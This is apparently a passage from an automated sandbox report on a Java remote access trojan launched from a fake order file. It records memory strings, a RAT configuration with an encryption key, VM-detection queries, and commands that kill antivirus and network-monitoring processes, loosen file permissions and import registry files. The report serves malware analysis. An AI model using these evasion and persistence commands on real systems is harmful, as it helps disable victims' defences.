        Source: javaw.exe, 00000006.00000002.2851634120.000000000A398000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A3E5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004F2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Description=Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004B3D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: /devicename=microsoft hyper-v generation counter
        Source: java.exe, 00000007.00000002.2845228924.000000000524C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_REGISTRY":"WLyQyhWoosi","DELAY_CONNECT":2,"VBOX":false}
        Source: java.exe, 00000007.00000003.1670111593.00000000154F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
        Source: java.exe, 00000007.00000003.1670111593.00000000154F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
        Source: xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VirtualMachineImpl.c
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Bdescription=microsoft hyper-v virtualization infrastructure driver
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeAPI call chain: ExitProcess graph end nodegraph_6-13354
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information queried: ProcessInformation
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_2_73A92C97 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_73A92C97
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_2_73A945FB LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,6_2_73A945FB
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_2_73A91244 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_73A91244
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeMemory protected: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MsMpEng.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM dumpcap.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamscheduler.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamservice.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM AdAwareService.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /FJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar" Jump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)MJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript C:\Users\user\zbrspjjraf.jsJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\krmyqqmohp.txt"Jump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.classJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbsJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbsJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /eJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exeJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.regJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MsMpEng.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:ListJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.regJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM dumpcap.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamscheduler.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamservice.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM AdAwareService.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MsMpEng.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM dumpcap.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamscheduler.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamservice.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM AdAwareService.exe /T /F
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004F14000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A3CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}S-Uninstall.exe"],"NAME":"MCShield Anti-Malware Tool"},{"PROCESS":["SDScan.exe","SDFSSvc.exe","SDWelcome.exe","SDTray.exe"],"NAME":"SPYBOT AntiMalware"},{"PROCESS":["UnThreat.exe","utsvc.exe"],"NAME":"UnThreat Antivirus"},{"PROCESS":["FortiClient.exe","fcappdb.exe","FCDBlog.exe","FCHelper64.exe","fmon.exe","FortiESNAC.exe","FortiProxy.exe","FortiSSLVPNdaemon.exe","FortiTray.exe","FortiFW.exe","FortiClient_Diagnostic_Tool.exe","av_task.exe"],"NAME":"FortiClient"},{"PROCESS":["CertReg.exe","FilMsg.exe","FilUp.exe","filwscc.exe","filwscc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Users\\user\\AppData\\Roaming\\krmyqqmohp.txt","VBOX":false,"RAM":"8.0 GB"}],"NAME":"VIPRE Security 2015"},{"PROCESS":["bavhm.exe","BavSvc.exe","BavTray.exe","Bav.exe","BavWebClient.exe","BavUpdater.exe"],"NAME":"Baidu Antivirus 2015"},{"PROCESS":["MCShi
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004F14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ACTIVE_WINDOW":"Program Manager","COMMAND":5}VBOX":false,"RAM":"8.0 GB"}c.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Usc4>
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004A29000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: F{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004F2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}#
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A398000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004A29000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A3CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ACTIVE_WINDOW":"Program Manager","COMMAND":5}VBOX":false,"RAM":"8.0 GB"}c.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Us
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerkv;
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A3E5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004A29000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004A29000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "{"ACTIVE_WINDOW":"Program Manager"
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_02DF03C0 cpuid 2_2_02DF03C0
        Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7388 VolumeInformation
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\rt.jar VolumeInformation
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jsse.jar VolumeInformation
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformation
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\charsets.jar VolumeInformation
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jfr.jar VolumeInformation
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Users\user\AppData\Local\Temp\jartracer.jar VolumeInformation
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7564 VolumeInformation
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7620 VolumeInformation
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\rt.jar VolumeInformation
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jsse.jar VolumeInformation
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformation
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jfr.jar VolumeInformation
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation
